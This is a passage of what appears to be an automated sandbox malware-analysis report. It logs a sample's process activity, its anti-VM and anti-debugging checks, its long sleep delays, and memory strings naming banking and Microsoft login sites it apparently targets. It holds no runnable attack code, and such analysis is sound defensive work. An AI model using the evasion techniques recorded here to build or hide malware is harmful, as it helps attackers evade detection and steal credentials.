                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: MN1qo2qaJmEvXDP.exe PID: 6340, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rlJvZXSinaRi.exe PID: 7184, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D324
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D7E4
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D944
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D504
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D544
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D1E4
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFEA3E30154
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFEA3E2DA44
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: 940000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: 2640000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: 4640000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: 4C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: 5C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: 5D50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: 6D50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: 9980000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: A980000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: AE10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: BE10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: 1600000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: 5680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: 6680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: 67B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: 77B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: 9F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: AF90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: BF90000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D096E rdtsc 10_2_016D096E
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2915Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2428Jump to behavior
                Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 1369Jump to behavior
                Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 8604Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.2 %
                Source: C:\Windows\SysWOW64\systray.exeAPI coverage: 2.8 %
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe TID: 6416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2036Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe TID: 7312Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\systray.exe TID: 7688Thread sleep count: 1369 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\systray.exe TID: 7688Thread sleep time: -2738000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\systray.exe TID: 7688Thread sleep count: 8604 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\systray.exe TID: 7688Thread sleep time: -17208000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe TID: 7712Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe TID: 7712Thread sleep time: -40500s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00ACC730 FindFirstFileW,FindNextFileW,FindClose,19_2_00ACC730
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: H846yjBj.19.drBinary or memory string: interactivebrokers.comVMware20,11696508427
                Source: H846yjBj.19.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                Source: H846yjBj.19.drBinary or memory string: outlook.office.comVMware20,11696508427s
                Source: H846yjBj.19.drBinary or memory string: discord.comVMware20,11696508427f
                Source: H846yjBj.19.drBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                Source: H846yjBj.19.drBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                Source: H846yjBj.19.drBinary or memory string: ms.portal.azure.comVMware20,11696508427
                Source: H846yjBj.19.drBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                Source: H846yjBj.19.drBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                Source: H846yjBj.19.drBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4780967354.0000000000A6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss/x
                Source: H846yjBj.19.drBinary or memory string: outlook.office365.comVMware20,11696508427t
                Source: H846yjBj.19.drBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                Source: H846yjBj.19.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                Source: H846yjBj.19.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                Source: H846yjBj.19.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                Source: H846yjBj.19.drBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                Source: H846yjBj.19.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                Source: H846yjBj.19.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                Source: H846yjBj.19.drBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                Source: firefox.exe, 00000017.00000002.2918452988.000001BFAA7FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS
                Source: H846yjBj.19.drBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                Source: systray.exe, 00000013.00000002.4778260554.0000000002F42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                Source: H846yjBj.19.drBinary or memory string: tasks.office.comVMware20,11696508427o
                Source: H846yjBj.19.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                Source: H846yjBj.19.drBinary or memory string: global block list test formVMware20,11696508427
                Source: H846yjBj.19.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                Source: H846yjBj.19.drBinary or memory string: dev.azure.comVMware20,11696508427j
                Source: H846yjBj.19.drBinary or memory string: bankofamerica.comVMware20,11696508427x
                Source: H846yjBj.19.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                Source: H846yjBj.19.drBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                Source: H846yjBj.19.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                Source: H846yjBj.19.drBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                Source: H846yjBj.19.drBinary or memory string: AMC password management pageVMware20,11696508427
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D096E rdtsc 10_2_016D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00417853 LdrLoadDll,10_2_00417853
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764164 mov eax, dword ptr fs:[00000030h]10_2_01764164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764164 mov eax, dword ptr fs:[00000030h]10_2_01764164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01728158 mov eax, dword ptr fs:[00000030h]10_2_01728158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01724144 mov eax, dword ptr fs:[00000030h]10_2_01724144
